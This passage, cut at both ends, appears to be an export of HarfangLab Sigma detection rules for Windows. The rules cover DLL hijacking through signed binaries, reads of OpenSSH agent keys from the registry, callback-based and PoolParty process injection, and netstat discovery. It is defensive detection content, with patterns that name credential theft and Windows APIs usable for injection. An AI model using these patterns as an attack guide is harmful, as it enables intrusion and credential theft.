"content": "title: DLL Hijacking via Dfsutil.exe\nid: e83d7b78-1e43-40d7-8800-306e1ec12054\ndescription: |\n Detects potential Windows DLL Hijacking via Dfsutil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Dfsutil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\netapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e83d7b78-1e43-40d7-8800-306e1ec12054",
"rule_name": "DLL Hijacking via Dfsutil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Dfsutil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e8559b97-e738-4a06-9a9b-817401d64936",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589338Z",
"creation_date": "2026-03-23T11:45:34.589342Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589350Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msicert.yml",
"content": "title: DLL Hijacking via MsiCert.exe\nid: e8559b97-e738-4a06-9a9b-817401d64936\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiCert.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiCert.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e8559b97-e738-4a06-9a9b-817401d64936",
"rule_name": "DLL Hijacking via MsiCert.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiCert.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e8880433-d351-4c68-ab08-ca979b1ad178",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074784Z",
"creation_date": "2026-03-23T11:45:34.074786Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074791Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/",
"https://attack.mitre.org/techniques/T1552/002/",
"https://attack.mitre.org/techniques/T1552/004/"
],
"name": "t1003_002_susp_registry_read_openssh_keys.yml",
"content": "title: OpenSSH Agent Keys Read from Registry\nid: e8880433-d351-4c68-ab08-ca979b1ad178\ndescription: |\n Detects a suspicious read operation on registry keys storing SSH keys when using an OpenSSH agent.\n Adversaries may try to steal SSH keys in order to move laterally within the information system.\n It is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\nreferences:\n - https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/\n - https://attack.mitre.org/techniques/T1552/002/\n - https://attack.mitre.org/techniques/T1552/004/\ndate: 2024/04/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.002\n - attack.t1552.004\n - attack.discovery\n - attack.t1012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject|startswith: 'HKU\\\\*\\SOFTWARE\\OPENSSH\\AGENT\\KEYS\\\\*'\n\n filter_ssh_agent:\n Image:\n - '?:\\Windows\\System32\\OpenSSH\\ssh-agent.exe'\n - '?:\\Program Files\\OpenSSH-Win64\\ssh-agent.exe'\n - '?:\\Program Files\\OpenSSH\\ssh-agent.exe'\n - '?:\\Program Files (x86)\\OpenSSH-Win64\\ssh-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e8880433-d351-4c68-ab08-ca979b1ad178",
"rule_name": "OpenSSH Agent Keys Read from Registry",
"rule_description": "Detects a suspicious read operation on registry keys storing SSH keys when using an OpenSSH agent.\nAdversaries may try to steal SSH keys in order to move laterally within the information system.\nIt is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1012",
"attack.t1552.002",
"attack.t1552.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e88a2dea-c3ee-4daa-8004-6cfa83f2363f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587296Z",
"creation_date": "2026-03-23T11:45:34.587299Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587307Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fondue.yml",
"content": "title: DLL Hijacking via fondue.exe\nid: e88a2dea-c3ee-4daa-8004-6cfa83f2363f\ndescription: |\n Detects potential Windows DLL Hijacking via fondue.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fondue.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msi.dll'\n - '\\osbaseln.dll'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e88a2dea-c3ee-4daa-8004-6cfa83f2363f",
"rule_name": "DLL Hijacking via fondue.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fondue.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e8a8f8bb-6e74-4ca2-872c-0b570f794072",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079635Z",
"creation_date": "2026-03-23T11:45:34.079637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079641Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@s12deff/execute-code-via-enumchildwindows-callback-c6cc986a05b0",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_remote_thread_callback_function.yml",
"content": "title: Remote Thread Created via a Callback Function\nid: e8a8f8bb-6e74-4ca2-872c-0b570f794072\ndescription: |\n Detects a remote thread starting a function calling a callback.\n Adversaries may inject malicious code in a remote process and use a function calling a callback to circumvent a direct call to their injected code when creating a remote thread.\n It is recommended to check for suspicious behavior by both injecting and injected processes.\nreferences:\n - https://medium.com/@s12deff/execute-code-via-enumchildwindows-callback-c6cc986a05b0\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/09/10\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n StartFunction|startswith:\n # can be exploited\n - 'EnumWindowStations'\n - 'EnumWindows'\n - 'EnumPwrSchemes' # win2003\n - 'EnumPageFiles'\n\n # probably exploitable if prerequisite\n - 'SymEnumProcesses' # need SymInitialize before\n - 'FlsAlloc' # then FlsSetValue\n - 'SwitchToFiber' # strange\n\n # probably exploitable with callback 1st\n - 'EnumUILanguages'\n - 'EnumLanguageGroupLocales'\n - 'EnumCalendarInfo'\n - 'EnumTimeFormatsEx'\n - 'EnumSystemLocalesEx'\n\n # probably not exploitable\n - 'EnumThreadWindows'\n - 'EnumResourceTypes'\n - 'EnumProps'\n - 'EnumObjects'\n - 'EnumICMProfiles'\n - 'EnumFonts'\n - 'EnumFontFamilies'\n - 'EnumerateLoadedModules'\n - 'EnumDisplayMonitors'\n - 'EnumDirTreeW'\n - 'EnumDesktopWindows'\n - 'GetThreadDesktop'\n - 'EnumDesktops'\n - 'EnumChildWindows'\n - 'CryptEnumOIDInfo'\n - 'CopyFile'\n - 'CertEnumSystemStore'\n - 'CertEnumSystemStoreLocation'\n - 'VerifierEnumResource'\n - 'SymEnumSourceFiles'\n - 'SymFindFileInPath'\n - 'SetupCommitFileQueueW'\n - 'SetTimer'\n - 'LdrEnumerateLoadedModules'\n - 'InitOnceExecuteOnce'\n - 'ImmEnumInputContext'\n - 'ImageGetDigestStream'\n\n # strange but seen itw\n - 'Thread32Next'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e8a8f8bb-6e74-4ca2-872c-0b570f794072",
"rule_name": "Remote Thread Created via a Callback Function",
"rule_description": "Detects a remote thread starting a function calling a callback.\nAdversaries may inject malicious code in a remote process and use a function calling a callback to circumvent a direct call to their injected code when creating a remote thread.\nIt is recommended to check for suspicious behavior by both injecting and injected processes.\n",
"rule_creation_date": "2024-09-10",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e8ab1ba0-0993-4c90-bbba-d1f1de486df6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096242Z",
"creation_date": "2026-03-23T11:45:34.096244Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096248Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_licensingui.yml",
"content": "title: DLL Hijacking via Licensing.exe\nid: e8ab1ba0-0993-4c90-bbba-d1f1de486df6\ndescription: |\n Detects potential Windows DLL Hijacking via Licensing.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LicensingUI.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\dui70.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e8ab1ba0-0993-4c90-bbba-d1f1de486df6",
"rule_name": "DLL Hijacking via Licensing.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Licensing.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e8bd72ec-7cea-45b6-bbcb-62c2c429ce00",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071051Z",
"creation_date": "2026-03-23T11:45:34.071053Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071058Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.safebreach.com/blog/process-injection-using-windows-thread-pools/",
"https://thehackernews.com/2023/12/new-poolparty-process-injection.html",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_worker_factory_startroutine_overwrite_injection.yml",
"content": "title: Process Injection via Worker Factory Start Routine Overwriting\nid: e8bd72ec-7cea-45b6-bbcb-62c2c429ce00\ndescription: |\n Detects a process injection by overwriting the Worker Factory Start Routine function. This technique is also known as 'PoolParty'.\n All processes in Windows have an User Mode Thread Pool by default. This pool contains Worker Threads responsible for executing code.\n A Worker Factory is the Kernel Mode object responsible for managing these Worker Threads.\n The Start Routine is the function pointer present in the Worker Factory structure that serves as the entry point for Worker Threads. This routine normally serves as the Thread Pool scheduler, responsible for dequeuing and executing work items.\n Adversaries may overwrite the Start Routine pointer address with malicious code and force the creation of a new thread, effectively executing their code inside of a new process.\n It is recommended to investigate both the injecting and target processes activities to determine legitimacy.\nreferences:\n - https://www.safebreach.com/blog/process-injection-using-windows-thread-pools/\n - https://thehackernews.com/2023/12/new-poolparty-process-injection.html\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/12/12\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessInjection\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n # We look for exported functions that are located near this exported symbol\n StartFunction|startswith: 'TpReleaseCleanupGroupMembers'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e8bd72ec-7cea-45b6-bbcb-62c2c429ce00",
"rule_name": "Process Injection via Worker Factory Start Routine Overwriting",
"rule_description": "Detects a process injection by overwriting the Worker Factory Start Routine function. This technique is also known as 'PoolParty'.\nAll processes in Windows have an User Mode Thread Pool by default. This pool contains Worker Threads responsible for executing code.\nA Worker Factory is the Kernel Mode object responsible for managing these Worker Threads.\nThe Start Routine is the function pointer present in the Worker Factory structure that serves as the entry point for Worker Threads. This routine normally serves as the Thread Pool scheduler, responsible for dequeuing and executing work items.\nAdversaries may overwrite the Start Routine pointer address with malicious code and force the creation of a new thread, effectively executing their code inside of a new process.\nIt is recommended to investigate both the injecting and target processes activities to determine legitimacy.\n",
"rule_creation_date": "2023-12-12",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e90145a1-9e20-4937-ad01-c8777f3af8c6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622786Z",
"creation_date": "2026-03-23T11:45:34.622788Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622792Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/software/S0104/"
],
"name": "t1049_netstat_windows.yml",
"content": "title: Network Statistics Discovered via Netstat (Windows)\nid: e90145a1-9e20-4937-ad01-c8777f3af8c6\ndescription: |\n Detects the execution of netstat.exe, a tool often used by attackers to gather detailed information about a computer's network connections.\n Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\n It is recommended to analyze the process responsible for the execution of netstat as well as to look for other malicious actions on the host.\nreferences:\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0104/\ndate: 2021/05/17\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.s0104\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\netstat.exe'\n # Renamed binaries\n - OriginalFileName: 'netstat.exe'\n\n selection_commandline:\n CommandLine:\n - 'netstat'\n - 'netstat -a'\n - 'netstat -f'\n - 'netstat -r'\n - 'netstat -??'\n - 'netstat -???'\n - 'netstat -???? tcp'\n - 'netstat.exe'\n - 'netstat.exe -a'\n - 'netstat.exe -f'\n - 'netstat.exe -r'\n - 'netstat.exe -??'\n - 'netstat.exe -???'\n - 'netstat.exe -???? tcp'\n # Filter-out missing parents\n ParentImage|contains: '?'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_commandline:\n ParentCommandLine|startswith:\n - '?:\\WINDOWS\\system32\\cmd.exe /d /s /c netstat '\n - 'cmd* /c netstat -*|*find '\n - 'cmd* /c netstat -*|*findstr '\n - '?:\\WINDOWS\\system32\\cmd.exe /c netstat -*|*find '\n - '?:\\WINDOWS\\system32\\cmd.exe /c netstat -*|*findstr '\n\n exclusion_webex:\n # Cisco Webex\n 